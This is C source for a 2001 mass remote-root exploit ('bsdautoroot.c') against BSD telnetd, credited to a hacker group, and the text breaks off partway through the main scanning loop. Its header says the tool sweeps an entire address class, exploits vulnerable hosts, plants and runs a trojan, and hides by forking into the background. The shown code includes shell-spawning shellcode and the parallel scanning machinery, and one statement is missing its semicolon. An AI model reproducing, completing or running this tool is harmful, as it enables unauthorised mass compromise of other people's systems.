/* x86/bsd telnetd remote autoroot exploit (mass enabled) * * The-WCH CONFIDENTIAL - SOURCE MATERIALS * * This is the manually published source code of The-WCH. * * The contents of these coded instructions, statements and computer * programs may not be disclosed to third parties, copied or duplicated in * any form, in whole or in part, without the prior written permission of * The-WCH. * * (C) COPYRIGHT The-WCH Security, 2001 * All Rights Reserved * ***************************************************************************** * * Based on the *bsd telnetd remote root by TESO * tested against: BSDI BSD/OS 4.1 * NetBSD 1.5 * FreeBSD 3.1 * FreeBSD 4.0-REL * FreeBSD 4.2-REL * FreeBSD 4.3-BETA * FreeBSD 4.3-STABLE * FreeBSD 4.3-RELEASE * * Name : bsdautoroot.c * Affected : bsd * Description : Mass bsd telnetd auto rooter * Type : Remote * Author : Goni * * Thanks TESO for a wonderful exploit. btw, sorry for ripping off some * lines from it, but you know...It was something that *has* to be done. * * This is the first release from The World Classic Hackers. Still a beta, but * the code for the members works better. This might not work for ./h4xa0r * (hehh kiddies) but some of you might be able to fix it, say ... * * char *blah[]={"#include <blah.h>","blah .. blah"}; * f=fopen("foo.c","w"); * if (f != NULL) { * while(blah[i] != (char*)0) { * fputs(blah[i],f); * fputs("\n",f); * i++; * } * fclose(f); * } * * Remember, the file trojan.c *must* be in the directory the program is * initiated from. Otherwise it will fail to work properly. * * Ok..in the end, this exploit is given two arguments, the Class to scan and * the log file. It will fork in the background and exploit the vulnerable host, * put the trojan on the remote host and execute it. Simple...isn't it :) * * btw, I don't use comments in the public releases. :) * * Many thanks to Innocent Buoy (innocentbuoy@hotmail.com) Founder, The-WCH * for pointing me out on many occasions.
* * Greets to macwiz, He's a real cute boy :P...I LOVE YOU DUDE.......PPPPP * * Next -> Exploit -> linux telnetd remote root * * Goni of The-WCH * thewch@hotmail.com * */ #include <sys/wait.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <arpa/telnet.h> #include <netdb.h> #include <errno.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <time.h> int mode=16, num=245, bs=1; int num34=244, pop34=71833, bs34=0, walk; int xp_check(int fd); void xp_pop(int fd); void xp_setenv(int fd, unsigned char *var, unsigned char *val); void xp(int fd); int shell(int socket); unsigned long int random_get(unsigned long int low, unsigned long int high); int badstr(unsigned char *code, int code_len, unsigned char *bad, int bad_len); unsigned long int x86_nop_rwreg(); unsigned long int x86_nop_xfer(char *xferstr); unsigned int x86_nop(unsigned char *dest, unsigned int dest_len, unsigned char *bad, int bad_len); #define BSET(dest, len, val, bw) { dest &= ~(((unsigned char) ~0) >> bw); dest |= val << (8 - bw - len); bw += len; } unsigned char *shellcode = "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"; #define MAX_SOCKETS 100 #define TIMEOUT 20 #define S_NONE 0 #define S_CONNECTING 1 #define S_CHECK 2 struct conn_t { int s,flags,pid; char status; time_t a; struct sockaddr_in addr; } connlist[MAX_SOCKETS]; void check_sockets(); void check(int i); int talk(int sd, char *pkt, int pktl, char opc); int make_keypkt(char *pktbuf, char opc); void print_ver(char *host,int vul, char *buf); void handle_alarm(int signum); char *filename; int main(int argc, char *argv[]) { int cip=1, bb=0, dd=0, i, qa=0; if (argc < 3) { printf("Usage: %s <Class> <Log>\n", argv[0]); printf("Class : Class to scan, i-e 192 will scan whole 192.*\n"); printf("Log : log file to use IPs.log\n") return -1; } if (fork()) 
return -1; filename=argv[2]; for (i = 0; i < MAX_SOCKETS; i++) { connlist[i].status = S_NONE; memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in)); } while(1) { for (i = 0; i < MAX_SOCKETS; i++) { if (cip == 255) { if (bb == 255) { FILE *f=fopen(filename,"a"); if (f != NULL) { fprintf(f,"%d.%d.0.0 - %d.%d.255.255\n",atoi(argv[1]),dd,atoi(argv[1]),dd); fclose(f); } if (dd == 255) { int k, ns=0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) { ns++; break; } } if (ns == 0) exit(0); break; } else { cip = 0; bb = 0; dd++; } } else { cip = 0; bb++; } } if (connlist[i].status == S_CHECK) { if (waitpid(connlist[i].pid,NULL,WNOHANG) > 0) { connlist[i].status = S_NONE; kill(connlist[i].pid,9); } } if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING)) { close(connlist[i].s); connlist[i].status = S_NONE; } if (connlist[i].status == S_CONNECTING) { if (connect(connlist[i].s, (struct socka